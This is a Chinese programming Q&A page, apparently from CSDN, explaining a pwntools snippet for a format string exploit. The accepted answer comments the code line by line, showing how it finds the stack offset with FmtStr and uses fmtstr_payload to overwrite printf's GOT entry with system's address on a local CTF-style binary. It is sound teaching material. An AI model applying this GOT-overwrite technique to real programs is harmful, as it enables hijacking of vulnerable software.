m0_54741246 2022-09-22 23:25 采纳率: 54.5%
浏览 66
已结题

pwntools 字符串漏洞利用工具

def exec_fmt(payload):
io.sendline(payload)
info = io.recv()
return info
auto = FmtStr(exec_fmt)
offest = auto.offest

payload = fmtstr_payload(offest,{printf_got : system_addr})
有没有带老详细解释一下啊这段啊

  • 写回答

2条回答 默认 最新

  • 不太能吃 2022-09-23 08:57
    关注

    pwn格式化字符串漏洞过程,一般会分两大步实现漏洞利用:

    1. 构造一个payload来寻找输入字符串到栈顶指针的偏移;
    2. 攻击,就是利用找到的偏移,在偏移处填入目的地址可以实现目的地址的内容泄露以及内容改写
      知道了基本步骤,就不难理解以下代码了
    def exec_fmt(payload):  //定义运行函数
        io = process('./auth')  //循环暴力求解,需要加该函数
        io.sendline(payload)  //发送一行数据,相当于在数据末尾加\n
        info = io.recv()  //接收数据
        return info  //将接收的数据作为函数返回值返回
    
    auto = FmtStr(exec_fmt)  //格式化,将运行函数作为参数传入FmtStr()中,运行函数的返回值则作为FmtStr()的参数
    offest = auto.offest  //通过格式化后的信息得到偏移offset
    
    payload = fmtstr_payload(offest,{printf_got : system_addr})  //自动生成格式化字符串
    //其中第一个参数offset为前面计算所得,第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}
    
    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论 编辑记录
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 10月1日
  • 已采纳回答 9月23日
  • 创建了问题 9月22日

悬赏问题

  • ¥15 使用ue5插件narrative时如何切换关卡也保存叙事任务记录
  • ¥20 软件测试决策法疑问求解答
  • ¥15 win11 23H2删除推荐的项目,支持注册表等
  • ¥15 matlab 用yalmip搭建模型,cplex求解,线性化处理的方法
  • ¥15 qt6.6.3 基于百度云的语音识别 不会改
  • ¥15 关于#目标检测#的问题:大概就是类似后台自动检测某下架商品的库存,在他监测到该商品上架并且可以购买的瞬间点击立即购买下单
  • ¥15 神经网络怎么把隐含层变量融合到损失函数中?
  • ¥15 lingo18勾选global solver求解使用的算法
  • ¥15 全部备份安卓app数据包括密码,可以复制到另一手机上运行
  • ¥20 测距传感器数据手册i2c